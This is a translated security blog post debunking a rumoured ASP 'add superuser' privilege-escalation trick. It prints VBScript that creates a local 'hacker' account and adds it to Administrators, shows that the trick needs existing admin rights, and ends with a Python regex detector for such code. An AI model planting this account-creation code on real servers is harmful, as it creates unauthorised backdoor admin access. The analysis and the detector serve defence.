Analysis of the legendary "add superuser" ASP code

xiaoxiao  2021-03-06

Excerpted from Lake2. This thing has been stirring up a lot of noise; if you don't know about it, take a look.

"Add superuser .asp code"

This article is.

The author also said, "Anyway the code is right, but very few can succeed, the specific look at". It was even tried on a webshell, and failed. With the error-handling statement removed, the error reason shown is "not enough permissions". With nothing to do today, I will analyze it a bit; I may not be ... oh.

The key part of his code is this:

    ' Get the local computer name through WScript.Network
    Set lp = Server.CreateObject("WScript.Network")
    ' Bind to the local machine and its Administrators group (ADSI WinNT provider)
    oz = "WinNT://" & lp.ComputerName
    Set ob = GetObject(oz)
    Set oe = GetObject(oz & "/Administrators,group")
    ' Create the user, set its password and commit it
    Set od = ob.Create("user", username)
    od.SetPassword passwd
    od.SetInfo
    ' Add the new user to the Administrators group
    oe.Add oz & "/" & username

It does nothing more than create a WScript.Network object in the ASP and, with this object, add a user to the administrators. And according to their statement, this exploits a local privilege escalation vulnerability in the .NetWork object (they say this one is MS's). Well, so I turned the code into a VBS script file. If I get a command line, I will try it.

Test.vbe (.vbe is better than .vbs; running a .vbs is restricted):

    Set lp = CreateObject("WScript.Network")
    oz = "WinNT://" & lp.ComputerName
    Set ob = GetObject(oz)
    Set oe = GetObject(oz & "/Administrators,group")
    Set od = ob.Create("user", "hacker")
    od.SetPassword "test"
    od.SetInfo
    oe.Add oz & "/" & "hacker"

Under Admin rights the hacker user is created; run with User permissions, the file fails with the error: access denied. So the permissions are still not enough, i.e. the so-called unpublished MS ".NetWork object local privilege escalation vulnerability" does not exist, at least not on my XP SP1. You can also save the code above as a .vbe and try it with User permissions. You could try for this bug on other systems, but since this ASP so rarely succeeds, it presumably does not exist there either.

Now, back to the ASP running under IIS. I turned off anonymous access in IIS locally, and this script works. But at that point you are browsing with administrator privileges. Think about it: with anonymous access turned off, why did no dialog pop up asking you to enter a username and password? Well, on the local machine you naturally pass the basic Windows verification, and since I am administrator, of course those ASPs inherited admin privileges. I wonder whether the author got it wrong here?

I think this legend is wrong; corrections are welcome. Let's talk about it first - I am not allowed to face ^_^
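An added example, not part of the original article or of Lake2's code: the script above only succeeds when the request already runs with admin rights, but its presence in a web root is still worth flagging, so this Python check scans ASP/VBS source for the account-creation pattern analysed here. The function names, verdict labels and the sample text are constructed for illustration; string-splitting tricks and Rem comments are outside its scope.

```python
import re

# Indicators from the snippet analysed above (VBScript is case-insensitive).
INDICATORS = {
    "winnt_provider": r'"\s*winnt:\s*//',
    "user_create": r'\.create\s*\(\s*"\s*user\s*"',
    "set_password": r'\.setpassword\b',
    "admin_group": r'administrators\s*,\s*group',
    "group_add": r'\.add\s+\S',
}
COMPILED = {k: re.compile(v, re.I) for k, v in INDICATORS.items()}

def strip_comments(source):
    """Drop VBScript ' comments without touching string literals."""
    out = []
    for line in source.splitlines():
        in_string = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string  # a doubled "" toggles twice
            elif ch == "'" and not in_string:
                line = line[:i]
                break
        out.append(line)
    return "\n".join(out)

def classify(source):
    """Return (verdict, sorted indicator names) for one script text."""
    code = strip_comments(source)
    hits = {n for n, rx in COMPILED.items() if rx.search(code)}
    creates = {"winnt_provider", "user_create", "set_password"} <= hits
    promotes = {"admin_group", "group_add"} <= hits
    if creates:
        return ("creates-local-admin" if promotes else "creates-local-user"), sorted(hits)
    return "no-match", sorted(hits)

# Constructed sample: the page's snippet as it would sit in an .asp file.
SAMPLE = '''<%
Set lp = Server.CreateObject("WScript.Network")
oz = "WinNT://" & lp.ComputerName
Set ob = GetObject(oz)
Set oe = GetObject(oz & "/Administrators,group")
Set od = ob.Create("user", username)
od.SetPassword passwd
od.SetInfo
oe.Add oz & "/" & username
%>'''

print(classify(SAMPLE))
```

A "creates-local-user" verdict means the script creates an account without the Administrators step; commented-out copies of the code report "no-match".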

When reposting, please cite the original address: https://www.9cbs.com/read-54228.html
